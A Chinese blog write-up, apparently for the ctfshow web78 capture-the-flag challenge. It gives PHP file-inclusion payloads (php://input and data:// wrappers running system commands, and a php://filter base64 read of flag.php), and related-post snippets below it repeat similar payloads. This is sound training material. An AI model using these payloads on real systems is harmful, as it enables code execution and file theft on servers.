ctfshow web78 获取flag(用老版的火狐浏览器)

已于 2024-04-29 14:51:37 修改
阅读量366 收藏 3
点赞数 4
分类专栏: web安全 文章标签: web
于 2024-04-28 20:33:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiaoYeZhu_1314/article/details/138290352
版权

题:

第一种:利用input伪协议 ,获取到flag

?file=php://input
POST data
<?php system('tac `ls`') ?>


第二种:利用flter协议,获取到flag

https://21d9e58a-c0fd-47ea-a9c4-d875100f2fdb.challenge.ctf.show/?file=php://filter/read=convert.base64-encode/resource=flag.php

得到的结果PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3swYjQxMWU5Zi1jMTY5LTQ0MTAtOThhNC1hYWE3MDY5MTkxMjB9Ijs=

转base64

$flag="ctfshow{0b411e9f-c169-4410-98a4-aaa706919120}";

第三种:利用data 协议 获取到fag

https://5c7c0c66-37bd-44f3-b49c-aeabc95bf80b.challenge.ctf.show?file=php://input
post data
data://text/plain,<?php system('tac flag.php'); ?>

第四种:扩展http,得到flag

小野猪都有白菜拱
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFSHOW web193 left标注盲注脚本
05-04
它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,括数据库名、表名、列名和 flag 的值。在获取每...
js监控IE火狐浏览器关闭、刷新、回退、前进事件
12-04
<... <head> <title>test</title>... var flag = true; [removed] = function () { if (flag) { var evt = window.event || arguments[0]; var userAgent = navigator.userAgent;
ctfshow web入门 文件含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7214
个人ctfshow刷题记录
ctfshow web入门 78-88的文件
Firebasky的博客
09-18 4177
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
2024年最新CTF利用大佬们的webshell拿取flag_ctf留言板获取flag(1),Golang系统面试题
最新发布
2401_84924864的博客
05-15 468
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。但唯一发现了一个zb.php无疑是个webshell。本来想把图片下载下来,看看一些大佬上传的图片马密码。需要的话可以点击**
[ctfshow]web入门文件78-88
L1ni01
12-04 2411
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志含漏洞 先抓,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
[LitCTF 2023]Flag点击就送!
陈艺秋的博客
08-27 795
通过抓后,在cookie字段发现了 特殊的东西,前面翻译过来跟题目没有太大关系,所以最后就看session字段,看着不像是base64,burp解码也不行。最后查看wp,结果发现还是base64,不过有些字符是乱码,所以一般的工具解密不出来。但是没有secret_key,有点离谱的是,看了几个wp都说直接盲猜是比赛名称。根据题目提示,和本题环境为flask,得知本题考察session伪造。然后就可以点击获取flag,结果回显提示,需要获取管理员。进入环境后是一个输入框,可以提交名字。
ctfshow 文件Web78-79
m0_62584974的博客
04-15 1842
Ctfshow文件含漏洞Web78 2022/4/15 漏洞简介: 文件含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种安全挑战,Web漏洞利用、密码学、逆向工程等。这里的"菜狗杯"可能是指比赛的昵称或名称,暗示这是一个初级到中级难度的竞赛,适合新手和进阶者参与。 ...
CTFSHOW web192 标注盲注脚本
05-04
此脚本尝试通过 SQL 注入获取一个网站的 flag,实现过程是构造不同的 SQL 注入 payload 并发送 POST 请求,如果返回的响应中含特定字符串,则说明获取到了一个字符,将其添加到 flag 中,最终输出完整的 flag。...
ctfshow-VIP题目-Web-详细解题思路
01-27
用kali自带的dirsearch工具扫描,发现/editor目录,访问出现一个编辑器上传附件的地方,发现文件空间可以查看路径,发现一个nothinghere文件夹,比较可疑,里面到fl000g.txt文件,访问/nothinghere/fl000g.txt,...
CTF题目学习记录
NeverSay_GiveUp的博客
11-10 965
CTF题目学习记录 题目1 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 解题思路: view_source [原理] 浏览器开发者工具 [目的] 掌握查看源代码的方式 [环境] windows [工具(浏览器)] firefox(火狐)或chrome(谷歌) [步骤] 1.用firefox打开页面,摁下F12,打开查看器可以得到flag 2.或用chrome打开页面,摁下F12,在Elements栏可以得到flag 题目2 X老师上课讲了Robots协议,小宁同学却上课打了瞌
Web1 信息收集
weixin_53896576的博客
01-17 3046
一、信息收集 1.注意源代码中的注释、源代码链接的奇怪路径,可能会有重要信息。 查看源代码的方式: 右键查看源代码 F12打开开发者⼯具 Ctrl+U 查看 Burp 抓查看:抓(packet capture)就是将网络传输发送与接收的数据进行截获、重发、编辑、转存等操作,也用来检查网络安全。抓也经常被用来进行数据截取等。 从js代码中获取flag:“网络上的js,一般是指Javascript(简称js),是一种脚本语言,不需要进行编译,也是浏览器中的一部...
ctfshow web入门 web文件web78--web81
2301_81040377的博客
04-03 311
php伪协议和日志文件访问
CTFshow——信息收集1-10
lee_maple的博客
01-15 5820
Web1 鼠标右键查看源码,即可看到flag Web2 到开发者选项,看网页源码,即可获得flag Web3 使用burp对该页面抓,即可获得flag Web4 首先了解robots协议: robots协议: robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。
ctfshow-web78(文件含)
m0_62094846的博客
01-11 1259
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php
CTFshow web入门web78-文件含1
weixin_74336671的博客
11-28 116
的攻击数据读取文件,拿到各种文件的。通过分析,此处未进行任何的过滤。利用Filter机制,构造。将flag提交结束!
CTFshow 文件web78
Kradress的博客
12-07 117
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:20 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
获取flag
热门推荐
qq_49091880的博客
01-02 1万+
获取FLAG值 一、SSH服务器 1.如何从外部进入最终root主机,获得flag值 SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
火狐浏览器打不开谷歌搜索
09-08
要解决火狐浏览器无法打开谷歌搜索的问题,你可以尝试以下方法: 1. 将火狐浏览器设置为默认在新的标签页中打开链接。这可以通过在浏览器中进行设置来实现。你可以点击浏览器菜单中的选项,然后选择“首选项”或“设置”,在打开的窗口中到“标签”或“新标签页”选项,将打开链接的方式设置为“在新的标签页中打开”。这样,当你点击链接时,链接将在新的标签页中打开,而不是覆盖当前页面。 2. 另一种解决方法是通过修改火狐浏览器的用户代理字符串。用户代理字符串是一个用来标识浏览器的字符串,通过修改它,你可以让火狐浏览器模拟其他浏览器的行为。你可以在浏览器地址栏中输入“about:config”,然后在确认页面中搜索“general.useragent.extra.firefox”。如果不到该选项,你可以右键点击空白处,选择“添加字符串”,然后输入“general.useragent.extra.firefox”并保存。然后将该选项的值修改为“Firefox/3.5.1”。通过这样的设置,火狐浏览器将以旧版本的身份模拟其他浏览器打开谷歌搜索,可能解决无法打开谷歌搜索的问题。 希望以上方法能帮助你解决问题。如果还有其他疑问,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小野猪都有白菜拱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值